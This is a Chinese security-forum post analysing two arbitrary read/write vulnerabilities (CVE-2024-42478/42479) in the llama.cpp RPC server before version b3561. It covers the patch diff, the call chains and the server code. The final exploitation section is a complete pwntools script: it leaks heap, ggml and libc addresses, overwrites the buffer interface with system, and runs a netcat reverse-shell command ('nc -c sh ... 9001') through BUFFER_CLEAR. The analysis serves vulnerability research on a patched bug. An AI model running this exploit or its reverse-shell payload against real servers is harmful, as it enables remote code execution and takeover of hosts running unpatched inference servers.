首页
社区
课程
招聘
[原创]llama.cpp版本小于b3561时GET_TENSOR SET_TENSOR组合漏洞RCE分析
发表于: 2025-9-15 15:47 519

[原创]llama.cpp版本小于b3561时GET_TENSOR SET_TENSOR组合漏洞RCE分析

2025-9-15 15:47
519

前言

24 年的时候,llama.cpp 出了两个漏洞 GHSA-5vm9-p64x-gqw9GHSA-wcr5-566p-9cwj(也就是 CVE-2024-42478 和 CVE-2024-42479)。影响版本是<=b3560,并在 b3561 中进行了修复。

根据 Github 中的描述,我们能控制 rpc_tensor 结构体中的 data 指针,可以实现任意地址读写,并且给出了调用链和 poc。

环境搭建

编译命令

1
2
cmake -B build -DGGML_RPC=ON -DCMAKE_CXX_FLAGS_RELEASE="-g"
cmake --build build -j 32

漏洞分析

Diff 分析

根据给出的版本号,笔者对 b3560 和 b3561 两个 tag 进行了 diff。结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
diff --git a/examples/rpc/README.md b/examples/rpc/README.md
index e1da801f..adedc890 100644
--- a/examples/rpc/README.md
+++ b/examples/rpc/README.md
@@ -1,5 +1,9 @@
 ## Overview
 
+> [!IMPORTANT]
+> This example and the RPC backend are currently in a proof-of-concept development stage. As such, the functionality is fragile and
+> insecure. **Never run the RPC server on an open network or in a sensitive environment!**
+
 The `rpc-server` allows  running `ggml` backend on a remote host.
 The RPC backend communicates with one or several instances of `rpc-server` and offloads computations to them.
 This can be used for distributed LLM inference with `llama.cpp` in the following way:
diff --git a/examples/rpc/rpc-server.cpp b/examples/rpc/rpc-server.cpp
index 7c15d2aa..6342e648 100644
--- a/examples/rpc/rpc-server.cpp
+++ b/examples/rpc/rpc-server.cpp
@@ -16,7 +16,7 @@
 #include <stdio.h>
 
 struct rpc_server_params {
-    std::string host        = "0.0.0.0";
+    std::string host        = "127.0.0.1";
     int         port        = 50052;
     size_t      backend_mem = 0;
 };
@@ -114,6 +114,17 @@ int main(int argc, char * argv[]) {
         fprintf(stderr, "Invalid parameters\n");
         return 1;
     }
+
+    if (params.host != "127.0.0.1") {
+        fprintf(stderr, "\n");
+        fprintf(stderr, "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
+        fprintf(stderr, "WARNING: Host ('%s') is != '127.0.0.1'\n", params.host.c_str());
+        fprintf(stderr, "         Never expose the RPC server to an open network!\n");
+        fprintf(stderr, "         This is an experimental feature and is not secure!\n");
+        fprintf(stderr, "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
+        fprintf(stderr, "\n");
+    }
+
     ggml_backend_t backend = create_backend();
     if (!backend) {
         fprintf(stderr, "Failed to create backend\n");
diff --git a/ggml/src/ggml-rpc.cpp b/ggml/src/ggml-rpc.cpp
index b01ad267..7757615f 100644
--- a/ggml/src/ggml-rpc.cpp
+++ b/ggml/src/ggml-rpc.cpp
@@ -197,6 +197,10 @@ static std::shared_ptr<socket_t> create_server_socket(const char * host, int por
         fprintf(stderr, "Failed to set SO_REUSEADDR\n");
         return nullptr;
     }
+    if (inet_addr(host) == INADDR_NONE) {
+        fprintf(stderr, "Invalid host address: %s\n", host);
+        return nullptr;
+    }
     struct sockaddr_in serv_addr;
     serv_addr.sin_family = AF_INET;
     serv_addr.sin_addr.s_addr = inet_addr(host);
@@ -879,6 +883,14 @@ ggml_tensor * rpc_server::deserialize_tensor(struct ggml_context * ctx, const rp
     if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
         return nullptr;
     }
+
+    // require that the tensor data does not go beyond the buffer end
+    uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
+    uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
+    uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
+    GGML_ASSERT(tensor->data + tensor_size >= tensor->data); // check for overflow
+    GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
+
     result->op = (ggml_op) tensor->op;
     for (uint32_t i = 0; i < GGML_MAX_OP_PARAMS / sizeof(int32_t); i++) {
         result->op_params[i] = tensor->op_params[i];
@@ -898,7 +910,7 @@ bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {
     const rpc_tensor * in_tensor = (const rpc_tensor *)input.data();
     uint64_t offset;
     memcpy(&offset, input.data() + sizeof(rpc_tensor), sizeof(offset));
-    size_t size = input.size() - sizeof(rpc_tensor) - sizeof(offset);
+    const size_t size = input.size() - sizeof(rpc_tensor) - sizeof(offset);
 
     struct ggml_init_params params {
         /*.mem_size   =*/ ggml_tensor_overhead(),
@@ -913,6 +925,17 @@ bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {
         return false;
     }
     GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %zu\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
+
+    // sanitize tensor->data
+    {
+        const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
+        const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
+
+        if (in_tensor->data + offset < p0 || in_tensor->data + offset >= p1 || size > (p1 - in_tensor->data - offset)) {
+            GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+        }
+    }
+
     const void * data = input.data() + sizeof(rpc_tensor) + sizeof(offset);
     ggml_backend_tensor_set(tensor, data, offset, size);
     ggml_free(ctx);
@@ -943,6 +966,17 @@ bool rpc_server::get_tensor(const std::vector<uint8_t> & input, std::vector<uint
         return false;
     }
     GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %" PRIu64 "\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
+
+    // sanitize tensor->data
+    {
+        const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
+        const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
+
+        if (in_tensor->data + offset < p0 || in_tensor->data + offset >= p1 || size > (p1 - in_tensor->data - offset)) {
+            GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+        }
+    }
+
     // output serialization format: | data (size bytes) |
     output.resize(size, 0);
     ggml_backend_tensor_get(tensor, output.data(), offset, size);
diff --git a/ggml/src/ggml.c b/ggml/src/ggml.c
index c937b5e5..38990e3a 100644
--- a/ggml/src/ggml.c
+++ b/ggml/src/ggml.c
@@ -3724,7 +3724,8 @@ static struct ggml_tensor * ggml_new_tensor_impl(
         struct ggml_tensor  * view_src,
         size_t                view_offs) {
 
-    assert(n_dims >= 1 && n_dims <= GGML_MAX_DIMS);
+    GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT);
+    GGML_ASSERT(n_dims >= 1 && n_dims <= GGML_MAX_DIMS);
 
     // find the base tensor and absolute offset
     if (view_src != NULL && view_src->view_src != NULL) {

rpc_server::deserialize_tensorrpc_server::set_tensorrpc_server::get_tensor 这几个方法添加了对 tensor->dataoffsetsize 的边界检查。根据 patch 来看,在添加检查之前,tensor->data+offset+size 是有可能越界的。

调用链分析

作者直接给出了两个漏洞的调用链。

任意地址读调用链:

  • start_rpc_server
    • rpc_serve_client
      • rpc_server::get_tensor
        • ggml_backend_tensor_get
          • ggml_backend_cpu_buffer_get_tensor

任意地址写调用链:

  • start_rpc_server
    • rpc_serve_client
      • rpc_server::set_tensor
        • ggml_backend_tensor_set
          • ggml_backend_cpu_buffer_set_tensor

这两个漏洞的调用链差不多,我们先来看任意读

任意地址读漏洞

start_rpc_server

start_rpc_server 是 RPC 服务的开始,初始化 socket 服务之后,进入循环

  1. socket_accept() 阻塞等待客户端连接
  2. 调用 rpc_serve_client() 处理单个客户端的 RPC 请求

rpc_serve_client

rpc_serve_client 为每一个客户端连接创建一个 rpc_server 实例,然后读取 1 字节 cmd,8 字节 input_size,以及 input.data()。因此每次通信的数据包结构如下:

数据包 cmd input_size input.data()
bytes 1 8 input_size

继续往下看是一个 switch 结构,add、edit、show、delete 都有了(CTF 选手的 DNA 动了)

图片描述

rpc_server::get_tensor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bool rpc_server::get_tensor(const std::vector<uint8_t> & input, std::vector<uint8_t> & output) {
    // serialization format: | rpc_tensor | offset (8 bytes) | size (8 bytes) |
    if (input.size() != sizeof(rpc_tensor) + 2*sizeof(uint64_t)) {
        return false;
    }
    const rpc_tensor * in_tensor = (const rpc_tensor *)input.data();
    uint64_t offset;
    memcpy(&offset, input.data() + sizeof(rpc_tensor), sizeof(offset));
    uint64_t size;
    memcpy(&size, input.data() + sizeof(rpc_tensor) + sizeof(offset), sizeof(size));
 
    struct ggml_init_params params {
        /*.mem_size   =*/ ggml_tensor_overhead(),
        /*.mem_buffer =*/ NULL,
        /*.no_alloc   =*/ true,
    };
    struct ggml_context * ctx = ggml_init(params);
    ggml_tensor * tensor = deserialize_tensor(ctx, in_tensor);
    if (tensor == nullptr) {
        GGML_PRINT_DEBUG("[%s] error deserializing tensor\n", __func__);
        ggml_free(ctx);
        return false;
    }
    GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %" PRIu64 "\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
    // output serialization format: | data (size bytes) |
    output.resize(size, 0);
    ggml_backend_tensor_get(tensor, output.data(), offset, size);
    ggml_free(ctx);
    return true;
}

get_tensor 会先验证输入的数据大小,并且解析出:rpc_tensor  结构体、offset(8 字节)、size(8 字节),这几个字段。也就是说我们能完全控制 tensor 结构体的内容。

然后创建一个临时的 ctx,并且对输入的 tensor 反序列化。deserialize_tensor 会把 tensor 中的一些字段拷贝到 result 中,这里需要注意的是 deserialize_tensor 会检测 result->buffer 是否在 buffers 中,不在则会返回 nullptr,所以 buffer 必须是一个合法的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
ggml_tensor * rpc_server::deserialize_tensor(struct ggml_context * ctx, const rpc_tensor * tensor) {
    ggml_tensor * result = ggml_new_tensor_4d(ctx, (ggml_type) tensor->type,
        tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
    for (uint32_t i = 0; i < GGML_MAX_DIMS; i++) {
        result->nb[i] = tensor->nb[i];
    }
    result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
    if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
        return nullptr;
    }
    result->op = (ggml_op) tensor->op;
    for (uint32_t i = 0; i < GGML_MAX_OP_PARAMS / sizeof(int32_t); i++) {
        result->op_params[i] = tensor->op_params[i];
    }
    result->flags = tensor->flags;
    result->data = reinterpret_cast<void *>(tensor->data);
    ggml_set_name(result, tensor->name);
    return result;
}

那么 buffers 中的元素是怎么来的?在 rpc_server::alloc_buffer 中会根据 size 申请一个 buffer 插入到 buffers 集合里。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bool rpc_server::alloc_buffer(const std::vector<uint8_t> & input, std::vector<uint8_t> & output) {
    // input serialization format: | size (8 bytes) |
    if (input.size() != sizeof(uint64_t)) {
        return false;
    }
    uint64_t size;
    memcpy(&size, input.data(), sizeof(size));
    ggml_backend_buffer_type_t buft = ggml_backend_get_default_buffer_type(backend);
    ggml_backend_buffer_t buffer = ggml_backend_buft_alloc_buffer(buft, size);
    uint64_t remote_ptr = 0;
    uint64_t remote_size = 0;
    if (buffer != nullptr) {
        remote_ptr = reinterpret_cast<uint64_t>(buffer);
        remote_size = buffer->size;
        GGML_PRINT_DEBUG("[%s] size: %" PRIu64 " -> remote_ptr: %" PRIx64 ", remote_size: %" PRIu64 "\n", __func__, size, remote_ptr, remote_size);
        buffers.insert(buffer);
    } else {
        GGML_PRINT_DEBUG("[%s] size: %" PRIu64 " -> failed\n", __func__, size);
    }
    // output serialization format: | remote_ptr (8 bytes) | remote_size (8 bytes) |
    output.resize(2*sizeof(uint64_t), 0);
    memcpy(output.data(), &remote_ptr, sizeof(remote_ptr));
    memcpy(output.data() + sizeof(uint64_t), &remote_size, sizeof(remote_size));
    return true;
}

ggml_backend_tensor_get

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
GGML_CALL void ggml_backend_tensor_get(const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    ggml_backend_buffer_t buf = tensor->view_src ? tensor->view_src->buffer : tensor->buffer;
 
    GGML_ASSERT(buf != NULL && "tensor buffer not set");
    GGML_ASSERT(tensor->data != NULL && "tensor not allocated");
    GGML_ASSERT(offset + size <= ggml_nbytes(tensor) && "tensor read out of bounds");
 
    if (!size) {
        return;
    }
 
    buf->iface.get_tensor(buf, tensor, data, offset, size);
}
 
GGML_CALL static void ggml_backend_cpu_buffer_get_tensor(ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    memcpy(data, (const char *)tensor->data + offset, size);
 
    GGML_UNUSED(buffer);
}

只对 offset + size <= ggml_nbytes(tensor) 进行了检测,然后就调用了 buf->iface.get_tensor 拷贝数据。完全没有考虑 data 和 buffer 字段是否合法性。所以我们只要构造一个能通过检查的 buffer 字段,修改 data 就能实现任意地址读写了。

作者在这里直接告诉了我们 buf->iface.set_tensor 执行的是 ggml_backend_cpu_buffer_get_tensor 函数,那 iface 又是怎么分配的?让我们回到 rpc_server::alloc_buffer,可以看到调用了 ggml_backend_get_default_buffer_type 获取默认的 buft,然后后执行 ggml_backend_buft_alloc_buffer 分配 buffer。

1
2
ggml_backend_buffer_type_t buft = ggml_backend_get_default_buffer_type(backend);
ggml_backend_buffer_t buffer = ggml_backend_buft_alloc_buffer(buft, size);

ggml_backend_get_default_buffer_type 会返回一个静态的 ggml_backend_buffer_type 结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GGML_CALL ggml_backend_buffer_type_t ggml_backend_cpu_buffer_type(void) {
    static struct ggml_backend_buffer_type ggml_backend_cpu_buffer_type = {
        /* .iface = */ {
            /* .get_name         = */ ggml_backend_cpu_buffer_type_get_name,
            /* .alloc_buffer     = */ ggml_backend_cpu_buffer_type_alloc_buffer,
            /* .get_alignment    = */ ggml_backend_cpu_buffer_type_get_alignment,
            /* .get_max_size     = */ NULL, // defaults to SIZE_MAX
            /* .get_alloc_size   = */ NULL, // defaults to ggml_nbytes
            /* .is_host          = */ ggml_backend_cpu_buffer_type_is_host,
        },
        /* .context = */ NULL,
    };
 
    return &ggml_backend_cpu_buffer_type;
}

因此 ggml_backend_buft_alloc_buffer 调用的是 ggml_backend_cpu_buffer_type_alloc_buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GGML_CALL ggml_backend_buffer_t ggml_backend_buft_alloc_buffer(ggml_backend_buffer_type_t buft, size_t size) {
    return buft->iface.alloc_buffer(buft, size);
}
 
GGML_CALL static ggml_backend_buffer_t ggml_backend_cpu_buffer_type_alloc_buffer(ggml_backend_buffer_type_t buft, size_t size) {
    size += TENSOR_ALIGNMENT;   // malloc may return an address that is not aligned
    void * data = malloc(size); // TODO: use GGML_ALIGNED_MALLOC (move to ggml-impl.h)
    if (data == NULL) {
        fprintf(stderr, "%s: failed to allocate buffer of size %zu\n", __func__, size);
        return NULL;
    }
 
    return ggml_backend_buffer_init(buft, cpu_backend_buffer_i, data, size);
}

分配 heap 到 data 指针后,通过 ggml_backend_buffer_init 初始化成 ggml_backend_buffer 后返回。

1
2
3
4
5
6
7
(*buffer) = (struct ggml_backend_buffer) {
    /* .interface = */ iface,
    /* .buft      = */ buft,
    /* .context   = */ context,
    /* .size      = */ size,
    /* .usage     = */ GGML_BACKEND_BUFFER_USAGE_ANY
};

最终的 buffer 结构是这个样子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
pwndbg> p *buffer
$1 = {
  iface = {
    get_name = 0x7f012b105570 <ggml_backend_cpu_buffer_name>,
    free_buffer = 0x7f012b1055d0 <ggml_backend_cpu_buffer_free_buffer>,
    get_base = 0x7f012b105580 <ggml_backend_cpu_buffer_get_base>,
    init_tensor = 0x0,
    set_tensor = 0x7f012b105660 <ggml_backend_cpu_buffer_set_tensor>,
    get_tensor = 0x7f012b105680 <ggml_backend_cpu_buffer_get_tensor>,
    cpy_tensor = 0x7f012b105fd0 <ggml_backend_cpu_buffer_cpy_tensor>,
    clear = 0x7f012b105640 <ggml_backend_cpu_buffer_clear>,
    reset = 0x0
  },
  buft = 0x7f012b199ba0 <ggml_backend_cpu_buffer_type>,
  context = 0x555a0cfc0430,
  size = 288,
  usage = GGML_BACKEND_BUFFER_USAGE_ANY
}
 
pwndbg> p *buffer.buft
$2 = {
  iface = {
    get_name = 0x7f012b105bf0 <ggml_backend_cpu_buffer_type_get_name>,
    alloc_buffer = 0x7f012b105d30 <ggml_backend_cpu_buffer_type_alloc_buffer>,
    get_alignment = 0x7f012b1055a0 <ggml_backend_cpu_buffer_type_get_alignment>,
    get_max_size = 0x0,
    get_alloc_size = 0x0,
    is_host = 0x7f012b1055b0 <ggml_backend_cpu_buffer_type_is_host>
  },
  context = 0x0
}

任意地址写漏洞

调用的是 rpc_server::set_tensor,成因和任意地址写基本一样,不再赘述。

漏洞利用

根据前面的分析,我们修改 data 就能实现任意地址读写,并且 alloc_buffer 还贴心给了 buffer 的地址,所以先考虑读 heap 上的内容。看了一圈 heap 中的内容,只能找到 ggml 的地址可以泄露。

图片描述

然后利用 ggml.so 中已经链接到真实地址的 got 表,我们还可以泄露出 libc 地址,然后修改堆上的 buft->iface,最后通过 BUFFER_CLEAR 触发 system

图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#!/usr/bin/env python3
# nc -lvnp 9001
from pwn import *
 
binary = ELF("./build/bin/rpc-server")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so", checksec=False)
ggml_so = ELF("/share/llama.cpp/llama-b3560/build/ggml/src/libggml.so", checksec=False)
context.binary = binary
 
 
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
 
 
def send_cmd(io: remote, cmd: int, buf: bytes):
    packet = p8(cmd)         # cmd, 1 byte
    packet += p64(len(buf))  # msg size, 8 bytes
    packet += buf            # content, size of the buffer you want to allocate
    io.send(packet)
 
 
def alloc_buffer(io: remote, size: int):
    send_cmd(io, ALLOC_BUFFER, p64(size))
    recv = p.recvn(0x8 + 0x10)
    ptr = u64(recv[0x8:0x10])
    sz = u64(recv[0x10:0x18])
    log.info(f"remote_ptr: {hex(ptr)}, remote_size: {sz}")
    return ptr, sz
 
 
def free_buffer(io: remote, remote_ptr):
    send_cmd(io, FREE_BUFFER, p64(remote_ptr))
 
 
def clear_buffer(io: remote, remote_ptr, value=0x00):
    send_cmd(io, BUFFER_CLEAR, p64(remote_ptr) + p8(value))
 
 
def arb_read(io: remote, valid_buffer_addr: int, target_addr: int, leak_size: int):
    rpc_tensor_pd = flat([
        0x1# id
        p32(2),  # type
        p64(valid_buffer_addr),  # buffer
        [p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef),],  # ne
        [p32(1), p32(1), p32(1), p32(1),],  # nb
        p32(0),  # op
        [p32(0)] * 16# op_params (corrected from 8 to 16)
        p32(0),  # flags
        [p64(0)] * 10# src
        p64(0),  # view_src
        p64(0),  # view_offs
        p64(target_addr),  # data
        'a' * 64# name
        'x' * 4  # padding
    ])
    content = rpc_tensor_pd
    content += p64(0# offset
    content += p64(leak_size)  # size
    send_cmd(io, GET_TENSOR, content)
    size = u64(p.recv(0x8))
    return p.recv(size)
 
 
def arb_write(io: remote, valid_buffer_addr: int, target_addr: int, data: bytes):
    rpc_tensor_pd = flat([
        0x1# id
        p32(2),  # type
        p64(valid_buffer_addr),  # buffer
        [p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef),],  # ne
        [p32(1), p32(1), p32(1), p32(1),],  # nb
        p32(0),  # op
        [p32(0)] * 16# op_params (corrected from 8 to 16)
        p32(0),  # flags
        [p64(0)] * 10# src
        p64(0),  # view_src
        p64(0),  # view_offs
        p64(target_addr),  # data
        'a' * 64# name
        'x' * 4  # padding
    ])
    content = rpc_tensor_pd
    content += p64(0# offset
    content += data
    send_cmd(io, SET_TENSOR, content)
 
 
p = remote("127.0.0.1", 50052)
remote_ptr, _ = alloc_buffer(p, 0x100)
buffer_ptr = remote_ptr + (0xf0 - 0x60)
leak_addr = remote_ptr + 0x80
log.info(f"buffer_ptr: {hex(buffer_ptr)}")
p.close()
 
p = remote("127.0.0.1", 50052)
remote_ptr, remote_size = alloc_buffer(p, 0x100)
# leak ggml base
recv = arb_read(p, buffer_ptr, leak_addr, 0x100)
leak_ggml_addr = u64(recv[0x10:0x18])
ggml_base = leak_ggml_addr - ggml_so.symbols["ggml_backend_cpu_buffer_name"]
ggml_puts_got = ggml_base + ggml_so.got["puts"]
log.info(f"leak_ggml_addr: {hex(leak_ggml_addr)}, ggml_puts_got: {hex(ggml_puts_got)}")
# leak libc base
recv = arb_read(p, buffer_ptr, ggml_puts_got, 0x100)
libc_puts_addr = u64(recv[:0x8])
libc_base = libc_puts_addr - libc.symbols["puts"]
log.info(f"libc_base: {hex(libc_base)}")
# hijack
cmd = flat([
    b"nc -c sh 127.0.0.1 9001".ljust(0x37, b" ") + b"\x00",
    libc_base + libc.symbols["system"]
])
arb_write(p, buffer_ptr, buffer_ptr, cmd)
clear_buffer(p, remote_ptr)
 
# ipdb.set_trace()
p.interactive()
p.close()

参考资料


传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2025-9-25 12:16 被Th3S编辑 ,原因: 更新
收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回